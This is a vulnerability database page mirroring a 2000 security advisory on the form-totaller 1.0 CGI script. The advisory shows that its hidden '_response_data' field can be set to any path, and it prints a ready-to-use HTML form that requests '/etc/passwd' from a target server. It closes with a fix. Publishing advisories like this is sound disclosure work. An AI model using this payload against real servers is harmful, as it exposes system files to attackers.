Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

form-totaller.txt

🗓️ 14 Aug 2000 00:00:00Reported by Signal 9Type 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 33 Views

Vulnerable form-totaller CGI allows remote file access via insecure response data field.

Code
`Content-Type: Remote Root via vulnerible CGI software  
Date : 13/08/2000  
Sender : s1gnal_9 <[email protected]>  
Subject : form-totaller Vulnerible CGI  
X-System : UNIX/NT systems running the form-totaller CGI software  
X-Status : s1gnal_9-ADVISORY-form-totaller.txt  
X-Greets : Narr0w, f0bic, VetesGirl  
_________________________________________________________________________________  
  
  
PRODUCT NAME: form-totaller version 1.0  
  
PRODUCT HOMEPAGE: http://www.newbreedsoftware.com/form-totaller/  
Also Available at freecode.com   
  
DESCRIPTION :   
Use "form-totaller" to create tests and quizes on the web.   
Use forms with pull-down menus or radio buttons and this CGI will display   
output based on their input.   
  
PROBLEM:  
The command field "_response_data" is the field that specifies the display output   
based on their input.   
  
The default file for this field is set at:  
<input type="hidden" name="_response_data" value="responses.dat">  
A remote attacker could easily change the cgi script to use "/etc/passwd" as the   
response data value.   
  
  
EXAMPLE:  
Below is a example of how we could read files on the remote system.  
  
<-------------------------CUT HERE-------------------------------------->  
<form action="http://www.SOMESERVER.com/form-totaller/form-totaller.cgi" method="post">  
<input type="hidden" name="_response_top" value="top.html">  
<input type="hidden" name="_response_data" value="/etc/passwd">  
<input type="hidden" name="_response_bottom" value="bottom.html">  
<input type="hidden" name="_divide_by" value="4">  
<input type="submit" value="Click for viewing of the /etc/passwd file.">  
</form>  
<-------------------------CUT HERE-------------------------------------->  
  
  
SOLUTION  
I would recommend hard-coding the response_data file right into the script   
and leave that command field out of the cgi.  
  
  
Please visit www.zone.ee/unix :)  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
14 Aug 2000 00:00Current
7.4High risk
Vulners AI Score7.4
form-totaller exploitremote file accessvulnerable cgi softwareunix systemssecurity advisory.
33